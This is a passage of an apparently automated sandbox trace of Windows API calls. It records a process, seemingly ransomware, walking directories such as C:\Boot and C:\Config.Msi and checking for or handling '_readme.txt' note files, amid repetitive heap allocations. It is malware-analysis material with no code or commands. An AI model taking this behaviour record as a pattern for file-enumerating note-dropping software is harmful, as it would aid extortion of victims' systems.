ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0129.894] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe392ace0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe392ace0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0129.894] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3950e40, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3950e40, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0129.894] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3950e40, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3950e40, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0129.894] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3950e40, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3950e40, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0129.895] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3950e40, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3950e40, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0129.895] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe36572c0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe36572c0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe36572c0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0129.895] PathFindExtensionW (pszPath="C:\\Boot\\_readme.txt") returned=".txt" [0129.895] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe36572c0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe36572c0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe36572c0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0129.895] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0129.895] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0129.895] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9138 [0129.895] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0129.895] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9930 [0129.895] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.896] PathFindFileNameW (pszPath="C:\\Config.Msi\\") returned="Config.Msi\\" [0129.896] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.896] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0129.896] PathFindFileNameW (pszPath="") returned="" [0129.896] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9930 [0129.896] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0129.897] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0129.897] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x800) returned 0x7516fe8 [0129.897] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0129.897] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2280 [0129.897] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0129.897] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.898] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9610 [0129.898] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9930 | out: hHeap=0x4970000) returned 1 [0129.898] FreeLibrary (hLibModule=0x759d0000) returned 1 [0129.898] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0129.898] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.898] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9610 | out: hHeap=0x4970000) returned 1 [0129.898] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9610 [0129.898] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x81c) returned 0xdcd2280 [0129.898] PathAppendW (in: pszPath="C:\\Config.Msi\\", pMore="_readme.txt" | out: pszPath="C:\\Config.Msi\\_readme.txt") returned 1 [0129.898] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.898] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9610 | out: hHeap=0x4970000) returned 1 [0129.898] PathFileExistsW (pszPath="C:\\Config.Msi\\_readme.txt") returned 1 [0129.898] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.898] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9610 [0129.898] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xe36a3580, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe36a3580, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0129.899] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9610 | out: hHeap=0x4970000) returned 1 [0129.899] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xe36a3580, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe36a3580, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.899] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe36a3580, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe36a3580, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe36a3580, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0129.899] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9610 [0129.899] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2a10 [0129.899] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9610 | out: hHeap=0x4970000) returned 1 [0129.899] PathFindExtensionW (pszPath="C:\\Config.Msi\\_readme.txt") returned=".txt" [0129.899] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2a10 | out: hHeap=0x4970000) returned 1 [0129.899] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe36a3580, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe36a3580, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe36a3580, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0129.899] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0129.899] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.899] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.899] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9138 | out: hHeap=0x4970000) returned 1 [0129.899] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0129.899] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2a10 [0129.899] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0129.899] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2ce0 [0129.899] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.899] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.899] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2ce0 | out: hHeap=0x4970000) returned 1 [0129.899] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2ce0 [0129.900] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2ce0 | out: hHeap=0x4970000) returned 1 [0129.900] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2ce0 [0129.900] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2ce0 | out: hHeap=0x4970000) returned 1 [0129.900] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2ce0 [0129.900] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2ce0 | out: hHeap=0x4970000) returned 1 [0129.900] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2ce0 [0129.900] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2ce0 | out: hHeap=0x4970000) returned 1 [0129.900] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2ce0 [0129.900] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2ce0 | out: hHeap=0x4970000) returned 1 [0129.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2a10 | out: hHeap=0x4970000) returned 1 [0129.900] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0129.900] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9138 [0129.900] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0129.900] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.900] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.900] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.900] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.900] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.900] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.900] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.901] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.901] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.901] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.901] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.901] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.901] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.901] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.901] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.901] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.901] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.901] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.901] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.901] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.901] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.901] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0129.901] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.901] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.901] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.901] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.901] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.901] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.901] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.901] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.901] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.901] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.901] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.901] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.901] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.901] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.901] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.901] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.901] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.901] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.901] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.902] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.902] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.902] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.902] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.902] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.902] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.902] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.902] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.902] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.902] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.902] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.902] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.902] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.902] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.902] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.902] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.902] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.902] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.902] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.902] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.902] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.902] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.902] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.902] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.902] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.902] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.902] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.902] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.902] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.902] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.902] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.902] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.902] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.903] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.903] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.903] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.903] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.903] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.903] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.903] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.903] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9138 | out: hHeap=0x4970000) returned 1 [0129.903] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0129.903] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9138 [0129.903] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0129.903] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.903] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.903] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.903] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.903] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.903] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.903] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.903] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.903] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.903] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.903] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.903] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.903] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.903] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.903] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.903] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.903] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.903] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.903] HeapFree (in: hHeap=0x4970000, 